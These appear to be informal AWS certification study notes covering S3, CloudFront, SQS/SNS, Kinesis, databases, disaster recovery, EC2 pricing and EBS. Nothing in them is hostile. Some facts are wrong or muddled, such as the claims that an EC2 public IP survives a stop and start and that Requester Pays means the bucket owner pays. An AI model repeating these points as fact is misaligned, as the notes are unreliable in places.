  • It stores files as native S3 objects, archives virtual tapes in Amazon Glacier and stores EBS snapshots generated by the Volume Gateway with Amazon EBS.

Elastic Load Balancer


  • Distributes incoming application or network traffic across multiple targets, such as EC2 instances containers (ECS), Lambda functions and IP addresses in multiple Availability zones

Security Group


  • A security group acts as a virtual firewall for your instance to control inbound and outbound traffic.

Route 53


  • A highly available and scalable Domain Name System (DNS) web service used for domain registration, DNS routing and health checking

AWS Transit Gateway


  • A networking service that uses a hub and spoke model to connect the on-premises data centers and Amazon VPCs to a Single Gateway.
  • With this service, customers only have to create and manage a single connection from the central gateway into each on-premises data center
  • Features:
    • Inter-region peering
      • allows customers to route traffic
      • easy and cost-effective way
    • Multicast
      • allows customers to have fine-grain control on who can consume and produce multicast traffic
    • Automated provisioning
      • customers can automatically identify the Site-to-site VPN connections and on-premises resources with which they are associated using AWS Transit Gateway

Amazon EMR


  • EMR (Elastic MapReduce)

  • A managed cluster that simplifies running big data frameworks like Apache Hadoop and Apache Spark on AWS to process and analyze vast amounts of data.

  • You can process data for analytics purposes and business intelligence workloads using EMR together with Apache Hive and Apache Pig

  • You can use EMR to move large amounts of data in and out of other AWS data stores and databases like S3 and DynamoDB

  • Purchasing options:

    • On-Demand:reliable, predictable, won’t be terminated
    • Reserved (min 1 year): cost savings (EMR will automatically use if available)

Auto Scaling


  • Configure automatic scaling for the AWS resources quickly through a scaling plan that uses Dynamic Scaling and Predictive scaling .
  • Useful for :
    • Cyclical traffic such as high use of resources during regular business hours and low use of resources
    • On and Off traffic such as batch processing, testing and periodic analysis
    • Variable traffic patterns, such as software for marketing growth with periods of spiky growth
  • Dynamic Scaling
    • To add and remove capacity for resources to maintain resource at target value
  • Predictive Scaling
    • To forecast the future load demands by analyzing your historical records for a metric
    • Allows schedule scaling by adding or removing capacity and controls maximum capacity
    • Only available for EC2 scaling groups
  • In Auto Scaling, the following statements are correct regarding the cooldown period:
    • It ensures that the Auto Scaling group does not launch or terminate additional EC2 instances before the previous scaling activity takes effect.
    • Its default value is 300 seconds.
    • It is a configurable setting for your Auto Scaling group.

S3


  • Server-side encryption (SSE) is about data encryption at rest-that is, Amazon S3 encrypts your data at the object level as it writes it to disks in its data centers and decrypts it for you when you access it.
    • You have three mutually exclusive options depending on how you choose to manage the encryption keys:

      1.Amazon S3-Managed Keys (SSE-S3)

      1. AWS KMS-Managed Keys (SSE-KMS)

      2. Customer-Provided Keys (SSE-C)

    • S3-Managed Encryption Keys (SSE-S3)

      • Amazon S3 will encrypt each object with a unique key and as an additional safeguard, it encrypts the key itself with a master key that it rotates regularly.
    • SSE-AES S3 handles the key, uses AES-256 algorithm

      • one of the strongest block ciphers available, 256-bit Advanced Encryption Standard (AES-256), to encrypt your data.
  • Client-side Encryption using
    1. AWS KMS-managed customer master key
    2. client-side master key
  • Cross-Account Access You can provide another AWS account access to an object that is stored in an S3 bucket.
    • These are the methods on how to grant cross-account access to objects that are stored in your own Amazon S3 bucket:

      • Resource-based policies and IAM policies
      • Resource-based Access Control List (ACL) and IAM policies
    • Cross-account IAM roles for programmatic and console access to S3 bucket objects

    • Supports failover controls for S3 Multi-Region access points.

  • Requester Pays Buckets
    • Bucket owners pay for all of the Amazon S3 storage and data transfer costs associated with their bucket.

CloudFront


Secrets Manager


  • Helps to manage, retrieve and rotate database credentials, application credentials, OAuth tokens, API keys and other secrets throughout their lifecycles
  • Helps to improve security posture , because you no longer need hard-coded credentials in application source code.
    • Storing the credentials in Secrets Manager helps avoid possible compromise by anyone who can inspect the application or the components.
    • Replace hard-coded credentials with a runtime call to the Secrets Manager service to retrieve credentials with a runtime call to the Secrets Manager service to retrieve credentials dynamically when you need them.

Textract


  • A fully managed document analysis service for detecting and extracting information from scanned documents
  • Return extracted data as key-value pairs (e.g. Name: John Doe)
  • Supports virtually any type of documents
  • Pricing
    • Pay for what you use
    • Charges vary for Detect Document Text API and Analyze Document API with the later being more expensive

RPO and RTO


  • RTO (Recovery Time Object)
    • measures how quickly the application should be available after an outage
  • RPO (Recovery Point Object)
    • refers to how much data loss can the application can tolerate
- Data loss is measured from most recent backup to the point of disaster. Downtime is measured from the point of disaster until fully recovered and available for service.

EC2



Network Firewall


  • AWS Network Firewall supports domain name stateful network traffic inspection
  • Can create allow lists and deny lists with domain names that the stateful rules engine looks for in network traffic
  • AWS Network Firewall is a stateful, managed network firewall and intrusion detection and prevention service for your virtual private cloud (VPC) that you created in Amazon Virtual Private Cloud (Amazon VPC).
    • With Network Firewall, you can filter traffic at the perimeter of your VPC.
    • This includes filtering traffic going to and coming from an internet gateway, NAT gateway, or over VPN or AWS Direct Connect.
  • Network Firewall uses the open source intrusion prevention system (IPS), Suricata, for stateful inspection. Network Firewall supports Suricata compatible rules.

Security


  • The security pillar includes the ability to protect data, systems, and assets to take advantage of cloud technologies to improve security

  • Zero Trust security is a model where application components or microservices are considered discrete from each other and no component or microservice trusts any other.

    Design Principles

    1. Implement a strong identity foundation

    2. Enable traceability

    3. Apply security at all layers:

      • Apply a defense in depth approach with multiple security controls

      • Implementing security to multiple layers (for example, edge of network, VPC, load balancing, every instance and compute service, operating system, application, and code).

    4. Automate security best practices:

    5. Protect data in transit and at rest:

    6. Keep people away from data:

    7. Prepare for security events:

Study-more

[ ] Spot Fleets [ ] Reserved Instances vs. Dedicated Hosts

Tutorialsdojo Cheatsheets

Api-gateway-cheatsheet

  • Enables developers to create, publish, maintain, monitor, and secure APIs at any scale

  • Create RESTful or WebSocket APIs

  • HIPAA compliant service

  • Allows creating, deploying and managing a RESTful API to expose backend HTTP endpoints, Lambda functions or other AWS services

  • Concepts

    • API deployment
      • a point-in-time snapshot of your API Gateway API resource and methods. To be available for clients to use, the deployment must be associated with one or more API stages
    • API endpoints
      • host names APIs in API Gateway, which are deployed to a specific region and of the format: rest-api-id.execute-api.region.amazonaws.com
    • Usage Plan
      • Provides selected API clients with access to one or more deployed APISs. You can use a usage plan to configure throttling and quota limits, which are enforced on individual client API keys
  • Features:

    • Amazon API Gateway provides throttling at multiple levels including global and by a service call. Throttling limits can be set for standard rates and bursts.
      • For example, API owners can set a rate limit of 1,000 requests per second for a specific method in their REST APIs, and also configure Amazon API Gateway to handle a burst of 2,000 requests per second for a few seconds.
  • Endpoint Types

    • Edge-optimized: For global clients
      • Requests are routed through a Cloudfront Edge Location for improved latency
      • The API Gateway still only lives in one region
    • Regional: for clients within the same region
      • You could still manually combine with CloudFront for control over caching strategies
    • Private: Only accessible in our VPC
      • Use a resource policy to define access
  • Stages

    • Create stages for different deployments of the API. Example: Production, Sandbox, QA, etc.
    • Switch between stages seamlessly
    • Similar to Azure Web App Deployment Slots
    • Use stage variables

Queueing (SQS)


Queueing (SQS)


  • What is Messaging System ?

    • Used to provide asynchronous communication and decouple processes via messages / events from sender and receiver (producer and consumer)
  • What is Queuing System ?

    • A queueing system is a messaging system that generally will delete messages once they are consumed .
    • Simple Communication
    • Not Real-time
    • Have to pull
    • Not reactive
  • Simple Queuing System (SQS)

    • Fully managed queuing service that enables you to decouple and scale mircroservices, distributed systems, and serverless applications
    • Use Case: You need to queue up transaction emails to be sent
    • e.g. Signup, Reset Password
    • Default retention 4 Days and Max of 14 days
    • Limitation of 256 KB per message sent
    • Low Latency (<10ms on publish and receive)
    • Can have duplicate messages (at least once delivery, occasionally)
    • Unlimited Throughput
    • Encryption:
      • In-flight encryption using HTTPS API
      • At-rest encryption using KMS keys
      • Client-side encryption if the client wants to perform encryption/decryption itself

SQS Message Visibility Timeout


  • After a message is polled by a customer it becomes invisible to other consumers
  • By default the “ message visibility timeout“ is 30 seconds
  • That means the message has 30 seconds to process
  • If the message is not processed in the visibility timeout, it will be processed twice
  • A consumer could call the ChangeMessageVisibility API to get more time
  • If the visibility timeout is high(hours) and consumer crashes, reprocessing will take time
  • If visibility timeout is too low (seconds), we may get duplicates

Long Polling


  • When a consumer requests messages from the queue, it can optionally ‘wait’ for messages to arrive if there are none in the queue - Long Polling
  • Long Polling decreases the number of API calls made to SQS while increasing the latency and efficiency of the application
  • The wait time can be between 1 sec to 20 sec
  • Long Polling is preferable to Short Polling
  • Long Polling can be enabled at the queue level or at the API level using WaitTimeSeconds

Streaming and Kinesis


  • What is Streaming ?

    • Multiple consumers can react to events (messages)

    • Events live in the stream for long periods of time, so complex operations can be applied

    • Real-time

    • Amazon-Kinesis

      • Amazon Kinesis is the AWS fully managed solution for collecting, processing and analyzing streaming data in the cloud

    Kinesis Data Streams

    • Capture,process and store data streams
      • Security:

        • Control access/ authorization using IAM policies
        • Encryption in flight using HTTPS endpoints
        • Encryption at rest using KMS
        • You can implement encryption/decryption of data on client-side (harder)
        • VPC endpoints available for Kinesis to access within VPC
        • Monitor API calls using CLoudTrail

    Kinesis Data Firehose

    • load data streams into AWS data stores
    • Pay for only data that is going through Firehose
    • Supports many data formats, conversions, transformations, compression

    Kinesis Data Streams vs Firehose

    Kinesis Data StreamsKinesis Data Firehose
    - Streaming service for ingest at scale- Load streaming data into S3 /Redshift /OpenSearch / 3rd Party /custom HTTP
    write Custom code (producer/consumer)Fully managed
    Real-time (~200 ms) Near real-time (buffer time min 60 sec)
    Managed scaling (shard splitting / merging)Automatic scaling
    Data storage for 1 to 365 days No data storage
    Supports replay capabilityDoesn’t support Capability

    Kinesis Data Analytics

    • analyze data streams with SQL or Apache Flink

    Kinesis Video Streams

    • Capture, process and store video streams

Pub-Sub and SNS


  • What is Pub / Sub ?

    • Publish-subscribe pattern commonly implemented in messaging systems.

    • In a pub/sub system the sender of messages (publishers) do not send their messages directly to receivers.

    • They instead send their messages to an event bus . The event bus categorizes their messages into groups.

    • The receivers of messages Subscribers subscribe to these groups

    • Whenever new messages appear within their subscription the messages are immediately delivered to them

    • Publisher have no knowledge of who their subscribers are

    • Subscribers do not pull for messages

    • Messages are instead automatically and immediately pushed to subscribers

    • Messages and events are interchangeable terms in pub/sub

    • Use case:

      • A real-time chat system
      • A web-hook system
  • Simple Notification Service

    • It is a highly available, durable, secure, fully managed pub/sub messaging service that enables you to decouple microservices, distributed systems and serverless applications

SQS and SNS - Fan Out Pattern


  • Push once in SNS, receive in all SQS queues that are subscribers
  • Fully decoupled : no data loss
  • SNS - Message Filtering
    • JSON policy used to filter messages sent to SNS topic’s subscriptions
    • If a subscription doesn’t have a filter policy, it receives every message

Cloudfront-cheatsheet

  • CloudFront is a CDN (Content Distribution Network). It makes website load fast by serving cached content that is nearby
  • CloudFront distributes cached copy at Edge Locations
  • Edge Locations aren’t just not read-only , you can write them eg. PUT objects
  • TTL (Time to live) defines how long until the cache expires (refreshes cache)
  • When you invalidate your cache, you are forcing it to immediately expire (refreshes cached data)
  • Refreshing the cache costs money because of transfer costs to update Edge locations
  • Origin is the address of where the original copies of your files reside eg. S3, EC2, ELB, Route53
  • Distribution defines a collection of Edge Locations and behavior on how it should handle your cached content
  • Distributions has 2 Types :
    • Web Distribution (statis website content)
    • RTMP (steaming media)
  • Origin Identity Access (OAI) is used access private S3 buckets
  • Access to cached content can be protected via Signed URLs or Signed Cookies
  • Lambda@Edge allows you to pass each request through a Lambda to change the behavior of the response

CloudFront


CloudFront


  • Content Distribution Network (CDN) creates cached copies of your website at various Edge locations around the world

  • Content Delivery Network (CDN)

    • A CDN is a distributed network of servers which delivers web pages and content to users based on their geographical location, the origin of the webpage and a content delivery server

      • Can be used to deliver an entire website including static, dynamic and streaming

      • 216 points of presence globally

      • DDoS protection since it is a global service. Integrates with AWS Shield and AWS WAF

      • Requests for content are served from the nearest Edge Location for the best possible performance


CloudFront Core Components


  • Origin

    • The location where all of original files are located. For example an S3 Bucket, EC2 Instance, ELB or Route53
  • Edge Location

    • The location where web content will be cached. This is different than an AWS Region or AZ
  • Distribution

    • A collection of Edge locations which defines how cached content should behave


CloudFront Distributions


  • A distribution is a collection of Edge Location. You specific the Origin eg. S3, EC2, ELB, Route53
  • It replicates copies based on your Price Class
  • There are two types of Distributions
    1. Web (for Websites)
    2. RTMP (for streaming media)
  • Behaviors
    • Redirect to HTTPs, Restrict HTTP Methods, Restrict Viewer Access, Set TTLs
  • Invalidations
    • You can manually invalidate cache on specific files via Invalidations
  • Error Pages
    • You can serve up custom error pages eg 404
  • Restrictions
    • You can use Geo Restriction to blacklist or whitelist specific countries

Lambda@Edge


  • Lambda@Edge functions are used to override the behavior of request and responses

  • Lambda@Edge lets you run Lambda functions to customize the content that CloudFront delivers, executing the functions in AWS locations closer to the viewer.

  • The functions run in response to CloudFront events, without provisioning or managing servers. You can use Lambda functions to change CloudFront requests and responses at the following points:

  • The 4 Available Edge Functions

    1. Viewer Request
      • When CloudFront receives a request from a Viewer
    2. Origin request
      • Before CLoudFront forwards a request to the origin
    3. Origin response
      • When cloudfront receives a response from the origin
    4. Viewer response
      • Before CLoudFront returns the response to the viewer

CloudFront Protection


  • By Default a Distribution allows everyone to have access
  • Original Identity Access (OAI)
    • A virtual user identity that will be used to give your CloudFront Distribution permission to fetch a private object
  • Inorder to use Signed URLs or Signed Cookies you need to have an OAI
  • Signed URLs
    • (Not the same thing as S3 Presigned URL)
      • A url with provides temporary access to cached objects
  • Signed Cookies
    • A cookie which is passed along with the request to CloudFront. The advantage of using a Cookie is you want to provide access to multiple restricted files. eg. Video Streaming

What is Database ?


What is Database ?


  • A database is data-store that store semi-structured and structured data
  • A database is more complex stores because it requires using formal design and modeling techniques
  • Database types:
    • Relational Database
      • Structured data represents tabular data (tables,rows and columns)
    • Non-Relational Database
      • Semi-Structured that may or may not represent tabular data
  • Set of functionality:
    • query
    • modeling strategies to optimize retrieval for different use cases
    • control over the transformation of the data into useful data structures or reports Database

What is Data Warehouse ?


  • Relational Database : designed for analytic workloads and a column-oriented data-store
  • Companies will have terabytes and millions of rows of data
  • Data warehouses generally perform aggregation
    • aggregation is is grouping data eg. finding a total or average
    • Data warehouses are optimised around columns since they need quickly aggregate column data
  • Data warehouses are generally designed be HOT
    • HOT means they can return queries very fast even though they have vast amounts of data
  • Data warehouses are infrequently accessed
    • intended for real time reporting but maybe once or twice a day or once a week to generate business or user reports
  • Data Warehouse needs to consume data from a relational database on a regular basis

What is a Key Value Store ?


  • A key-value database is a type of non-relational database (NoSQL) that uses a simple key-value method to store data
    • Stores a unique key alongside a value
    • will interpret this data resembling a dictionary
    • can resemble tabular data, it does not have to have the consistent columns per row -Due to simple design so they can scale well beyond a relational database

What is a document database ?


  • Document store - a NOSQL database that stores documents as its primary data-structure
    • it could be an XML but more commonly is JSON or JSON-like

    • they are sub-class of key/value stores


NOSQL Database Services


  • DynamoDB

    • a serverless NOSQL key/Value and document database
    • designed to scale to billions of records with consistent data return in at least a second- millisecond latency
    • It is AWS’s flagship database service meaning it is cost-effective and very fast
    • DAX cluster for read cache, microsecond read latency
    • Event Processing: DynamoDB Streams to integrate with AWS Lambda, or Kinesis Data Streams
    • Global Table feature: active-active setup
    • Automated backups up to 35 days with PITR (restore to new table), or on-demand backups
    • Export to S3 without using RCU within the PITR window, import from S3 without using WCU
    • Great to rapidly evolve schema
    • It is a massively scalable database
    • Usecases: Serverless applications development (small documents 100s Kb), distributed serverless cache
  • DocumentDB

    • A NOSQL document database that is “MongoDB compatible”
    • MongoDB is very popular NOSQL among developers there were open-source licensing issues around using open-source MongoDB , so aws got aorund it by just building their own MongoDB database
    • when you want a MongoDB database
  • Amazon KeySpaces

    • A fully managed Apache Cassandra database
    • Cassandra is an open-source NOSQL key/value database similar to DynamoDB in that is columnar store database but has some additional functionality
    • when you want to use Apache Casandra

Relational Database Service


  • Relational Database Services (RDS)

    • supports multiple SQL engines
    • Relational is synonymous with SQL and Online Transactional Processing (OLTP)
    • most commonly used type of database among tech companies and start ups
    • RDS supports the following SQL Engines:
      • MYSQL - Most popular open source SQL database that was purchased and now owned by Oracle
      • MariaDB - When Oracle bought MYSQL. MariaDB made a fork (copy) of MYSQL was made under a different open-source license
      • Postgres (PSQL) - Most popular open-source SQL database among developers. Has rich-features over MYSQL but at added complexity
      • Oracle - Oracle’s proprietary SQL database. Well used by Enterprise companies. Have to buy a license to use it
      • Microsoft SQL Server - Microsoft’s proprietary SQL database. Have to buy license to use it
      • Aurora - Fully managed database
        • Aurora
          • fully managed database,
          • database of either MYSQL (5X faster) and PSQL (3X faster) database
          • When you want a highly available, durable, scalable and secure relational database for Postgres or MySQL then Aurora is correct fit
      • Aurora Serverless - serverless on-demand version of Aurora. - When you want “most” of the benefits of Aurora but can trade to have cold-starts or you don’t have lots of traffic demand
      • RDS on VMware - allows you to deploy RDS supported engines to on-premise data center. - datacenter must be using VMware for server virtualization - when you want databases managed by RDS on your own datacenter

Other Database Services


  • RedShift
    • petabyte-size data-warehouse
    • Data warehouses
      • are for Online Analytical Procesing (OLAP)
      • can be expensive because they are keeping data “hot”
      • “HOT” means we can run a very complex query and a large amount of data and get that data very fast
      • Usage: when you want to quickly generate analytics or reports from a large amount of data
  • ElasticCache
    • a managed database of the in-memory and caching open-source databases
    • Redis or Memcached
    • Usage: when you want to improve the performance of application by adding a caching layer in-front of web-server or database
  • Neptune
    • a managed graph database
    • Data is represented in interconnected nodes
    • Usage: when you need to understand the connections between data eg. Mapping Fraud Rings or Social Media Relationships
  • Amazon Timestreams
    • a fully managed time series database
    • Related to Devices that send lot of data that are time-sensitive such as IOT devices
    • Usage: When you need to measure how things change over time
  • Amazon Quantum Ledger Database
    • a fully managed ledger database that provides transparent, immutable and cryptographically variable transaction logs
    • Usage: when you need to record history of financial activities that can be trusted
  • Database Migration Service
    • a database migration service
    • Can migrate from:
      • On-premise database to AWS
      • from two database in different or same AWS accounts using SQL engines
      • from a SQL to NOSQL database

Disaster Recovery

Disaster Recovery in AWS


  • Any event that has a negative impact on a company’s business continuity or finances is a disaster

  • Disaster recovery (DR) is about preparing for and recovering from a disaster

  • What kind of disaster recovery?

    • On-premise => On-Premise: traditional DR and very expensive
    • On-Premise => AWS cloud: hybrid recovery
    • AWS Cloud Region A => AWS Cloud Region B
  • Disaster Recovery Strategies

    • Backup and Restore

      • High RPO

      • Cheap

      • Easy to implement

    • Pilot Light

      • small version of the app is always running in the cloud
      • Useful for the critical core components of the application (Pilot Light)
      • Very similar to Backup and Restore
      • Faster than Backup and Restore as critical systems are already up
    • Warm Standby

      • Full system is up and running, but at minimum size
      • Upon disaster we can scale to production load
    • Hot Site/ Multi Site Approach

      • Very low RTO (minutes or seconds) - very expensive
      • Full production scale is running AWS and On Premise

Database Migration Service

  • Supports heterogeneous and homogeneous migrations
  • You must create an EC2 instance to perform the replication tasks
  • Sources can be on-prem databases or EC2-based databases, Azure SQL Databases, Amazon RDS, Amazon S3, and DocumentDB
  • Targets can be on-prem databases, Amazon RDS, Redshift, DynamoDB, OpenSearch, Redis, Babelfish, DocumentDB, etc.
  • AWS Schema Conversion Tool (SCT) can convert the database schema from one engine to another if you are migrating to a different database engine

Continuous Replication

Multi-AZ Deployment

  • When Multi-AZ Enabled, DMS provisions and maintains a synchronously stand replica in a different AZ
    • Advantages:
      • Provide Data Redundancy
      • Eliminates I/O freezes
      • Minimizes latency spikes

RDS to Aurora Migration

  • Options:
    • Snapshot RDS and migrate to Aurora
    • Create an Aurora Read REplica from RDS mySQL and when the replication lag is 0, promote it as it’s own DB Cluster
    • If MySQL is external to RDS, you can backup with Percona XtraBackup and import into Aurora
    • Use DMS if both databases are up and running

On-premise Strategies

  • You can download Amazon Linux ISO and run on-prem hypervisors
  • Import/export VMs for on-prem to AWS
  • Use AWS Application Discovery Service to gather info about on-prem VMs and plan a migration
    • Track with AWS migration hub
    • Agentless Discovery
      • VM inventory, configuration, performance history, etc.
    • Agent-Based Discovery
      • System configuration, system performance history, running processes, network connection details, etc.
    • Use Application Migration Service (MGN) to lift-and-shift VMs to AWS
  • AWS Database Migration Service
    • Migrate data across database engines
    • Migrate databases from on-prem to AWS
  • AWS Server Migration
    • Incremental replication of on-prem servers to AWS
    • Converts on-prem servers to cloud-based servers

AWS Backup#

  • Fully managed
  • Centrally manage and automate backups across all AWS services
  • AWS Backup supports cross-region backups and cross-account backups
  • Backup policies are known as Backup Plans
  • Vault Lock is used to enforce a Write-Once-Read-Many policy (WORM) to ensure backups in the Vault cannot be deleted. Even the root user cannot delete backups when enabled.

Disaster-recovery-cheatsheet

  • Backup
    • EBS Snapshots, RDS automated backups/ Snapshots etc
    • Regular pushes to S3/ S3 IA/ Glacier, Lifecycle Policy, Cross Region Replication
    • From On-Premise:Snowball or Storage Gateway
  • High availability
    • Use Route 53 to migrate DNS over Region to Region
    • RDS Multi-AZ, Elastic Cache Multi-AZ, EFS, S3
    • Site to Site VPN as a recovery from Direct Connect
  • Replication
    • RDS Replication (Cross Region),AWS Aurora + Global Databases
    • Database replication from on-premise to RDS
    • Storage Gateway
  • Automation
    • CloudFormation / Elastic Beanstalk to re-create a whole new environment
    • Recover / Reboot Ec2 instances with CloudWatch if alarms fail
    • AWS Lambda functions for customized automatons
  • Chaos
    • Netflix has a “simian-army” randomly terminating EC2

Savings Plan

Savings Plan

  • Get a discount based on long term usage
  • Commit to a certain amount of usage

Spot Instances

  • Up to 90% discount
  • Specify a max price you are willing to pay for your instances. If you go over the price, you lose the instance
  • The MOST cost-efficient instance pricing
  • Useful for workloads that are resilient to failure (batch jobs, etc.)

Dedicated Hosts

  • A physical server with EC2 instance capacity dedicated to your use
  • Allows you to address compliance or licensing requirements
  • The most expensive option in AWS
  • Purchasing OPtions
    • On-demand
    • Reserved Instances

Dedicated Instances

  • Instances run on hardware dedicated to you
  • You may share hardware with other instances in same account
  • No control over instance placement.

Reserved Instances (RI)

  • Designed for applications that have a steady state, predictable usage or require reserved capacity.
  • Reduced Pricing is based on Term x Class Offering x Payment Option
    • Term

      • {The longer the term the greater the savings}
      • Commit to 1 year or 3 Year contract
      • Reserved Instances do not renew automatically
      • When it is expired it will use on-demand with no interruption to service
    • Class

      • {The less flexible the greater savings}
      • Standard
        • Up to 75% reduced pricing compared to on-demand
        • Can modify RI attributes
      • Convertible
        • Up to 54% reduced pricing compared to on-demand
        • can exchange RI based on RI attributes if greater or equal in value
      • Scheduled
        • AWS no longer offers Scheduled RI
    • Payment Options

      • {The greater upfront the greater savings}
      • All upfront : full payment at the start
      • Partial Upfront : A portion of the cost must be paid and remaining hours billed at a discounted hourly rate
      • No Upfront : billed at a discounted hourly rate for every hour within the term,regardless of whether the Reserved Instance is being used
    • RIs can be shared between multiple accounts within AWS organization
    • Unused RIs can be sold in the Reserved Instance Marketplace

Reserved Instance (RI) Attributes

  • RI attributes
    • are limited based on class offering and can affect the final price of an RI instance
    • 4 RI attributes:
      • Instance Type:
        • eg. m4.Large. This is composed of the instance family (for example , m4) and the instance size (for example large)
      • Region:
        • The region in which the Reserved Instance is purchased
      • Tenancy:
        • Whether your instance runs on shared(default) or single-tenant (dedicated) hardware
      • Platform:
        • the operating system eg. Windows or Linux/Unix

Regional and Zonal RI

Regional RI : purchase for a regionZonal RI : purchase for an Availability Zone
does not reserve capacityreserves capacity in the specified Availability Zone
RI discount applies to instance usage in any AZ in the RegionRI discount applies to instance in the selected AZ (No AZ Flexibility)
Ri discount applied to instance usage within the instance family, regardless of size. Only supported n Amazon Linux, Unix Reserved Instances with default tenancyNo instance size flexibility Ri discounts applies to instance usage for the specified instance type and size only
You can queue purchases for regional RIYou can’t queue purchases for Zonal RI

RI Limits


  • There is a limit to the number of Reserved Instances that you can purchase per month
    • Per month you can purchase
      • 20 Regional Reserved Instances per Region
      • 20 Zonal Reserved Instances per AZ
Regional LimitsZonal Limits
You cannot exceed your running On-Demand Instance limit by purchasing regional Reserved Instances. The default On-Demand Instance limit is 20.You can exceed your running On-Demand Instance limit by purchasing zonal Reserved Instances
Before purchasing RI ensure On-Demand limit is equal to or greater than your RI you intend to purchaseIf you already have 20 running On-Demand Instances, and you purchase 20 Zonal Reserved Instances, you can launch a further 20 On-Demand Instances that match the specifications of your zonal Reserved Instances

Capacity Reservations

  • EC2 instances are backed by different kind of hardware, and so there is a finite amount of servers available within an Availability Zone per instance type or family
  • You go to launch a specific type of EC2 instance but AWS has ran out of that server
  • Capacity reservation is a service of EC2 that allows you to request a reserve of EC2 instance type for a specific Region and AZ

Standard vs Convertible RI

Standard RIConvertible RI
RI attributes can be modified - Change the AZ within same Region - Change the scope of the Zonal RI to Regional RI or visa versa - Change the instance size (Linux/Unix only, default tenancy) - Change network from Ec2-Classic to VPC and visa versaRI attributes can’t be modified (you perform an exchange)
Can’t be exchangedCan be exchanged during the term for another Convertible RI with new RI attributes, including: - Instance type - Instance Family - Platform - Scope - Tenancy
Can be bought or sold in the RI MarketplaceCan’t be bought or Sold in the RI Marketplace

RI Marketplace

  • EC2 Reserved Instance Marketplace allows you to sell your unused Standard RI to recoup your RI spend for RI you do not intend or cannot use

  • Reserved Instances can be sold after they have been active for at least 30 days and once AWS has received the upfront payment (if applicable)

  • You must have a US bank account to sell Reserved Instances on the Reserved Instance Marketplace

  • There must be at least one month remaining in the term of the Reserved Instance you are listing

  • You will retain the pricing and capacity benefit of your reservation until it’s sold and the transaction is complete

  • Your company name ( and address upon request) will be shared with the buyer for tax purposes.

  • A seller can set only the upfront price for a Reserved Instance. The usage price and other configuration (eg. instance type, availability zone, platform) will remain the same as when the Reserved Instance was initially purchased

  • The term length will be rounded down to the nearest month. For example, a reservation with 9 months and 15 days remaining will appear as 9 months on the Reserved Instance Marketplace.

  • You can sell upto $20,000 in Reserved Instances per year. If you need to sell more Reserved Instances

  • Reserved Instances in the GovCloud region cannot be sold on the Reserved Instance Marketplace

EC2

EC2

  • EC2 is not just virtual machines, it consists of VMs, EBS, EIP, ENI, etc.
  • Use user-data to run a script at launch. This script is only run once at the instances first start and runs as root
  • t2.micro is part of the free tier

EC2 Instance Types

  • General Purpose (t)
  • Compute Optimized (c)
  • Memory Optimized (r)
  • Storage Optimized (i,d,h1)

Security Groups

  • Security Groups are like a firewall for EC2 instances
  • Security groups only contain allow rules
  • Security groups are stateful. Meaning if we have an inbound allow rule, we don’t need a corresponding outbound allow rule
  • For the source of the traffic, Security Groups can reference an IP address, other security groups, and prefix lists
  • Security Groups and VMs have a many-to-many relationship

Ports to know for the exam

  • 21 = FTP
  • 22 = SSH/sFTP
  • 80 = HTTP
  • 443 = HTTPS
  • 3389 = RDP
  • 5432 - Postgresql
  • 3306 - MySQL
  • Oracle RDS - 1521
  • MSSQL - 1433
  • MariaDB - 3306

Placement Groups

  • Use Placement Groups when you want to control how your EC2 instances are scheduled on underlying infrastructure
  • Placement Group strategies
    • Cluster
      • Scheduled EC2 instances into a low-latency group in a single Availability Zone
      • Use cases:
        • Big Data job that needs to complete fast
        • Application that needs extremely low latency and high network throughput
    • Spread
      • Pros:
        • Can span across Availability Zones (AZ)
        • Reduced risk is simultaneous failure
        • EC2 instances are on different physical hardware
      • Cons:
        • Limited to 7 instances per AZ per placement group
      • Use cases:
        • Application that needs to maximize high availability
        • Critical Applications where each instance must be isolated from failure from each other
    • Partition
      • Spreads instances across many different partitions (which rely on sets of racks) within an AZ. Scales to 100s of EC2 instances per group

Elastic Network Interfaces

  • The ENI can have the following attributes:
    • Primary private IPV4, one or more secondary IPv4
    • One ELastic IP (IPv4) per private IPv4
    • One or more Security Groups
    • A MAC address
  • You can create ENI independently and attach them on fly (move them) on EC2 instances for failover
  • Bound to a specific availability zone (AZ)
  • You can change the Termination Behavior so that if a VM is deleted the attached ENI is/isn’t deleted with it

Spot Instances

  • Up to 90% discount
  • Specify a max price you are willing to pay for your instances. If you go over the price, you have two options:
    • Two minute grace period
    • Stop the instance or terminate the instance
  • If you don’t want AWS to reclaim the capacity, you can use a Spot Block to block AWS from reclaiming the instance for a specified time-frame (1-6 hours)
  • The MOST cost-efficient instance pricing
  • Useful for workloads that are resilient to failure (batch jobs, etc.)
  • Persistent vs. One-Time Spot Requests. With a persistent spot request, if an instance is terminated, it will be restarted. With a one-time spot request, if an instance is terminated, it will NOT be restarted.

Spot Fleets

  • Get a set of spot instances + On-Demand instances
  • Strategies
    • Lowest Price: Spot Fleet will launch instances from the pool with the lowest price
    • Diversified: distributed across all pools
    • capacityOptimized: pool with optimal capacity for the number of instances
    • priceCapacityOptimized: Pools with highest capacity available, then select the pool with the lowest price

Elastic IPs

  • When you start and stop an EC2 instance, the public IP won’t change
  • You can only have 5 Elastic IP addresses in your AWS account by default. You can ask AWS to increase this limit.
  • Try to avoid using EIP

EC2 Hibernate

  • Store the RAM on disk when the OS is stopped.
  • Faster startup
  • The root EBS volume must be encrypted and it must have enough space to store the contents of RAM
  • Instance RAM size must be less than 150GB
  • Does not work for bare metal instances

EBS

  • Bound to an AZ
  • Can be attached/detached from instances on the fly
  • EBS volumes can be mounted to multiple instances using ‘multi-attach’
    • Up to 16 instances at a time can be attached to a volume
  • You can move an EBS volume across AZ by creating a snapshot and copying it to another region
  • Snapshots
    • You can move a snapshot to an ‘archive tier’ that is 75% cheaper
    • Takes 24 to 72 hours to restore the snapshot from the archive
    • Recycle Bin
      • You can setup rules to retain deleted snapshots so you can easily recover them
      • Specify a retention for the recycle bin (from 1 day to 1 year)
    • Fast Snapshot Restore (FSR)
      • Force full initialization of your snapshot to have no latency on first use.
      • Expensive to use
  • Encryption
    • data at rest and data in motion are both encrypted
    • all snapshots are encrypted
    • Copying an unencrytped snapshot enables encryption
    • How to encrypt an unencrypted volume
      1. Create a snapshot of the volume
      2. Encrypt the snapshot using the copy function
      3. Create new EBS volume from the snapshot (the volume will be encrypted)
      4. Attach the encrypted volume to the original instance
  • Root volumes are automatically deleted (Termination Policy) when a EC2 instance is terminated. Other EBS volumes attached to the instance are not deleted unless their termination policy says to delete them on termination of the EC2 instance.

EC2 Instance Store

  • Ephemeral storage
  • High performance
  • Use cases:
    • buffer
    • cache
  • Data loss when the EC2 instance reboots

AMI

